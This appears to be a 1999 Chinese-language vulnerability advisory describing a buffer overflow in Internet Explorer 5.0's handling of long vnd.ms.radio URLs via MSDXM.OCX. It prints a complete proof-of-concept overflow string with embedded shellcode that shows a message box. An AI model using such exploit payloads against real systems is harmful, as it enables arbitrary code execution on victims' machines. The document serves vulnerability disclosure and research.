发布日期：1999-12-06
更新日期：1999-12-08

受影响系统：

Microsoft Internet Explorer 5.0 for Windows NT 4.0
   + Microsoft Windows NT 4.0
Microsoft Internet Explorer 5.0 for Windows 98
   + Microsoft Windows 98
Microsoft Internet Explorer 5.0 for Windows 95
   + Microsoft Windows 95

描述：

---

Internet Explorer可以处理vnd.ms.radio格式的URLs：音频流内容。如果在'vnd.ms.radio' 后指定一个超过360个字符的URL，MSDXM.OCX文件会产生溢出，造成在客户端可以执行任意代码。

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

以下是URL或连接的二进制文件，它可以造成堆栈溢出，显示一个简单信息框，让后执行死循环。所有的二进制数据以[xx]表示。其余的是文本字符。
  
Off Data
  
------------------------------------------------
  
000 vnd.ms.radio:\\j
010 kwashere9991[C0][89][07][83]
020 [EF][0C]PWWP[FF][15][14][16]0[1D][EB][FE]00
030 0000000000000000
040 0000000000000000
050 0000000000000000
060 0000000000000000
070 0000000000000000
080 0000000000000000
090 0000000000000000
0A0 0000000000000000
0B0 0000000000000000
0C0 0000000000000000
0D0 0000000000000000
0E0 0000000000000000
0F0 0000000000000000
100 0000000000000000
110 0000000000000000
120 0000000000000000
130 0000000000[1D]00000
140 00[1D]000[1D]000[1D]000[1D]0
150 000[1A][6F][36][1D]0000000[1D]0
160 000000[1D]0

------------------------------------------------

建议：

---

暂无

浏览次数：8495
严重程度：0（网友投票）